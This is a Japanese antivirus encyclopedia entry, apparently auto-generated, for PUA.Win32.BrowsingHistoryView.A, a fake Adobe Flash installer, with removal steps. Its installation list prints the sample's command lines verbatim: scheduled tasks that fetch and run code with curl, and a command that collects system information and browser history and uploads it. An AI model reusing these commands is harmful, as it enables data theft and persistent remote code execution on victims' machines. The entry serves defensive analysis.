
PUA.Win32.BrowsingHistoryView.A
Windows

- マルウェアタイプ: 潜在的に迷惑なアプリケーション
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
プログラムは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
プログラムは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
プログラムは、以下のプロセスを追加します。
- "%User Temp%\is-7BMQH.tmp\{malware file name}.tmp" /SL5="$30120,2564865,721408,{malware file path and name}"
- "cmd" /c md "%AppDataLocal%\Programs\Common" & copy "%AppDataLocal%\Programs\Adobe\curl.exe" "%AppDataLocal%\Programs\Common" & copy "%AppDataLocal%\Programs\Adobe\mute.exe" "%AppDataLocal%\Programs\Common"
- "cmd" /c schtasks /create /tn UserLicenseUpdate /tr "'%AppDataLocal%\Programs\Common\mute.exe' cmd /c 'cd '%AppDataLocal%\Programs\Common' & curl.exe -k -f -s -H 'UID:20191018180837' --output EULA.txt & EULA.txt'" /sc minute /mo 60 /f
- "cmd" /c schtasks /create /tn LiveUpdateService /tr "regsvr32 /s '%AppDataLocal%\Programs\Common\update.dll'" /sc minute /mo 5 /f
- "cmd" /c (reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /reg:64 & echo *** & systeminfo & echo *** & dir /a "%ProgramFiles%" & dir /a "%ProgramFiles(x86)%" & echo *** & "%AppDataLocal%\Programs\Adobe\HistoryView.exe" /nosort /SaveDirect /HistorySource 1 /LoadIE 1 /LoadFirefox 1 /LoadChrome 1 /StopIECacheTask 1 /stab "%TEMP%\readme.html" & echo *** & wmic process get Name, CommandLine, ExecutablePath /format:csv & echo ***) > "%TEMP%\readme.txt" & type "%TEMP%\readme.html" >> "%TEMP%\readme.txt" & "%AppDataLocal%\Programs\Adobe\curl.exe" -k -s --connect-timeout 30 --retry 30 --retry-connrefused --retry-delay 10 -F "data=@%TEMP%\readme.txt" & del "%AppDataLocal%\Programs\Adobe\HistoryView.exe" & del "%AppDataLocal%\Programs\Adobe\mute.exe" "%AppDataLocal%\Programs\Adobe\curl.exe" "%AppDataLocal%\Programs\Adobe\update.exe"
- "cmd" /c ""%AppDataLocal%\Programs\Adobe\update.exe" -p200 -d"%AppDataLocal%\Programs\Common""
- "%AppDataLocal%\Programs\Adobe\flashplayer32ax_jd_install.exe"
- reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /reg:64
- systeminfo
- "%AppDataLocal%\Programs\Adobe\HistoryView.exe" /nosort /SaveDirect /HistorySource 1 /LoadIE 1 /LoadFirefox 1 /LoadChrome 1 /StopIECacheTask 1 /stab "%User Temp%\readme.html"
- %System%\Wbem\WMIC.exe wmic process get Name, CommandLine, ExecutablePath /format:csv
- %AppDataLocal%\Programs\Adobe\CURL.EXE "%AppDataLocal%\Programs\Adobe\curl.exe" -k -s --connect-timeout 30 --retry 30 --retry-connrefused --retry-delay 10 -F "data=@%User Temp%\readme.txt"
- "%AppDataLocal%\Programs\Adobe\update.exe" -p200 -d"%AppDataLocal%\Programs\Common"
- taskeng.exe {08404169-C149-4FC7-A92A-6E21139D6C27} S-1-5-21-2407829820-1079796033-203259571-500:{computername}\{username}:Interactive:[1]
- %AppDataLocal%\Programs\Common\mute.exe cmd /c "cd "%AppDataLocal%\Programs\Common" & curl.exe -k -f -s -H "UID:20191018180837" --output EULA.txt & EULA.
- %System%\regsvr32.EXE /s "%AppDataLocal%\Programs\Common\update.dll"
- cmd /c cd %AppDataLocal%\Programs\Common & curl.exe -k -f -s -H UID:20191018180837 --output EULA.txt & EULA.
- %AppDataLocal%\Programs\Common\CURL.EXE curl.exe -k -f -s -H UID:20191018180837 --output EULA.txt
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)
プログラムは、以下のフォルダを作成します。
- %User Temp%\Adobe_ADMLogs
- %AppDataLocal%\Programs\Adobe
- %AppDataLocal%\Programs\Common
- %User Temp%\is-17JQN.tmp\_isetup
- %User Profile%\AppData
- %System Root%\Users
- %AppDataLocal%\Programs
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。. %User Profile%フォルダは、現在ログオンしているユーザのプロファイルフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)
他のシステム変更
プログラムは、以下のファイルを削除します。
- %Windows%\Tasks\UserLicenseUpdate.job
(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
プログラムは、以下のレジストリ値を追加します。
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000
Owner = "\xe0\x08\x00\x00k\xb3\xa1\x19\xb5\x85\xd5\x01"
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000
SessionHash = "{random characters}"
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000
Sequence = "1"
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000
RegFiles0000 = "\x00\x00\x00sP\xe7\xa3\xafc\xe5\x90\x90\xe3\xa0\x80\x01\xe1\x80\x80t\xe0\xa7\x8f"
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000
RegFilesHash = "{random characters}"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Inno Setup: Setup Version = "6.0.3 (u)"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Inno Setup: App Path = "%AppDataLocal%\Programs\Adobe"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
InstallLocation = "%AppDataLocal%\Programs\Adobe"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Inno Setup: Icon Group = "Adobe"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Inno Setup: User = "{username}"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Inno Setup: Language = "english"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
DisplayName = "Adobe version 1.8"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
UninstallString = "%AppDataLocal%\Programs\Adobe\unins000.exe"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
QuietUninstallString = "%AppDataLocal%\Programs\Adobe\unins000.exe /SILENT"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
DisplayVersion = "1.8"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
Publisher = "Adobe, Inc."
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
URLInfoAbout = "https://get.{BLOCKED}e.com/ru/flashplayer"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
HelpLink = "https://get.{BLOCKED}e.com/ru/flashplayer"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
URLUpdateInfo = "https://get.{BLOCKED}e.com/ru/flashplayer"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
NoModify = "1"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
NoRepair = "1"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
InstallDate = "20191018"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
MajorVersion = "1"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
MinorVersion = "8"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
VersionMajor = "1"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
VersionMinor = "8"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
{9173B522-909A-4256-A459-10373008D3E0}_is1
EstimatedSize = "5171"
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\DirectDraw\MostRecentApplication
Name = "flashplayer32ax_jd_install.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\DirectDraw\MostRecentApplication
ID = "1572508830"
プログラムは、以下のレジストリキーを削除します。
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000\RegFilesHash
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000\RegFiles0000
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000\Sequence
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000\SessionHash
HKEY_CURRENT_USER\Software\Microsoft\
RestartManager\Session0000\Owner
作成活動
プログラムは、以下のファイルを作成します。
- %AppDataLocal%\Programs\Adobe\is-HKTEK.tmp
- %AppDataLocal%\Programs\Adobe\is-29K64.tmp
- %User Temp%\Adobe_ADMLogs\Adobe_GDE.log
- %AppDataLocal%\Programs\Common\CURL.EXE
- %User Temp%\Adobe_ADMLogs\Adobe_ADM.log
- %AppDataLocal%\Programs\Common\update.dll
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite-wal
- %User Temp%\readme.html
- %AppDataLocal%\Programs\Adobe\unins000.exe
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite
- %AppDataLocal%\Programs\Adobe\HistoryView.exe
- %AppDataLocal%\Programs\Adobe\update.exe
- %AppDataLocal%\Programs\Adobe\unins000.dat
- %AppDataLocal%\Programs\Adobe\is-CIDNQ.tmp
- %AppDataLocal%\Programs\Adobe\is-U2TSB.tmp
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite-shm
- %AppDataLocal%\Programs\Adobe\is-R8STH.tmp
- %User Temp%\readme.txt
- %AppDataLocal%\Programs\Adobe\mute.exe
- %AppDataLocal%\Programs\Adobe\flashplayer32ax_jd_install.exe
- %AppDataLocal%\Microsoft\Internet Explorer\MSIMGSIZ.DAT
- %AppDataLocal%\Programs\Adobe\CURL.EXE
- %AppDataLocal%\Programs\Common\mute.exe
- %AppDataLocal%\Programs\Adobe\is-TQOT0.tmp
(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
このウイルス情報は、自動解析システムにより作成されました。
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
「PUA.Win32.BrowsingHistoryView.A」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
- 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
手順 3
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- Owner = "\xe0\x08\x00\x00k\xb3\xa1\x19\xb5\x85\xd5\x01"
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- SessionHash = "{random characters}"
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- Sequence = "1"
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- RegFiles0000 = "\x00\x00\x00sP\xe7\xa3\xafc\xe5\x90\x90\xe3\xa0\x80\x01\xe1\x80\x80t\xe0\xa7\x8f"
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- RegFilesHash = "{random characters}"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Inno Setup: Setup Version = "6.0.3 (u)"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Inno Setup: App Path = "%AppDataLocal%\Programs\Adobe"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- InstallLocation = "%AppDataLocal%\Programs\Adobe"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Inno Setup: Icon Group = "Adobe"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Inno Setup: User = "{username}"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Inno Setup: Language = "english"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- DisplayName = "Adobe version 1.8"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- UninstallString = "%AppDataLocal%\Programs\Adobe\unins000.exe"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- QuietUninstallString = "%AppDataLocal%\Programs\Adobe\unins000.exe /SILENT"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- DisplayVersion = "1.8"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- Publisher = "Adobe, Inc."
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- URLInfoAbout = "https://get.{BLOCKED}e.com/ru/flashplayer"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- HelpLink = "https://get.{BLOCKED}e.com/ru/flashplayer"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- URLUpdateInfo = "https://get.{BLOCKED}e.com/ru/flashplayer"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- NoModify = "1"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- NoRepair = "1"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- InstallDate = "20191018"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- MajorVersion = "1"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- MinorVersion = "8"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- VersionMajor = "1"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- VersionMinor = "8"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{9173B522-909A-4256-A459-10373008D3E0}_is1
- EstimatedSize = "5171"
- In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication
- Name = "flashplayer32ax_jd_install.exe"
- In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication
- ID = "1572508830"
手順 4
以下のファイルを検索し削除します。
- %AppDataLocal%\Programs\Adobe\is-HKTEK.tmp
- %AppDataLocal%\Programs\Adobe\is-29K64.tmp
- %User Temp%\Adobe_ADMLogs\Adobe_GDE.log
- %AppDataLocal%\Programs\Common\CURL.EXE
- %User Temp%\Adobe_ADMLogs\Adobe_ADM.log
- %AppDataLocal%\Programs\Common\update.dll
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite-wal
- %User Temp%\readme.html
- %AppDataLocal%\Programs\Adobe\unins000.exe
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite
- %AppDataLocal%\Programs\Adobe\HistoryView.exe
- %AppDataLocal%\Programs\Adobe\update.exe
- %AppDataLocal%\Programs\Adobe\unins000.dat
- %AppDataLocal%\Programs\Adobe\is-CIDNQ.tmp
- %AppDataLocal%\Programs\Adobe\is-U2TSB.tmp
- %Application Data%\Mozilla\Firefox\Profiles\lj5mikyj.default\places.sqlite-shm
- %AppDataLocal%\Programs\Adobe\is-R8STH.tmp
- %User Temp%\readme.txt
- %AppDataLocal%\Programs\Adobe\mute.exe
- %AppDataLocal%\Programs\Adobe\flashplayer32ax_jd_install.exe
- %AppDataLocal%\Microsoft\Internet Explorer\MSIMGSIZ.DAT
- %AppDataLocal%\Programs\Adobe\CURL.EXE
- %AppDataLocal%\Programs\Common\mute.exe
- %AppDataLocal%\Programs\Adobe\is-TQOT0.tmp
手順 5
以下のフォルダを検索し削除します。
- %User Temp%\Adobe_ADMLogs
- %AppDataLocal%\Programs\Adobe
- %AppDataLocal%\Programs\Common
- %User Temp%\is-17JQN.tmp\_isetup
- %User Profile%\AppData
- %System Root%\Users
- %AppDataLocal%\Programs
手順 6
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「PUA.Win32.BrowsingHistoryView.A」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 7
以下のファイルをバックアップを用いて修復します。なお、マイクロソフト製品に関連したファイルのみ修復されます。このマルウェア/グレイウェア/スパイウェアが同社製品以外のプログラムをも削除した場合には、該当プログラムを再度インストールする必要があります。
- %Windows%\Tasks\UserLicenseUpdate.job
手順 8
以下の削除されたレジストリキーまたはレジストリ値をバックアップを用いて修復します。
※註:マイクロソフト製品に関連したレジストリキーおよびレジストリ値のみが修復されます。このマルウェアもしくはアドウェア等が同社製品以外のプログラムも削除した場合には、該当プログラムを再度インストールする必要があります。
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- RegFilesHash
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- RegFiles0000
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- Sequence
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- SessionHash
- In HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
- Owner
ご利用はいかがでしたか? アンケートにご協力ください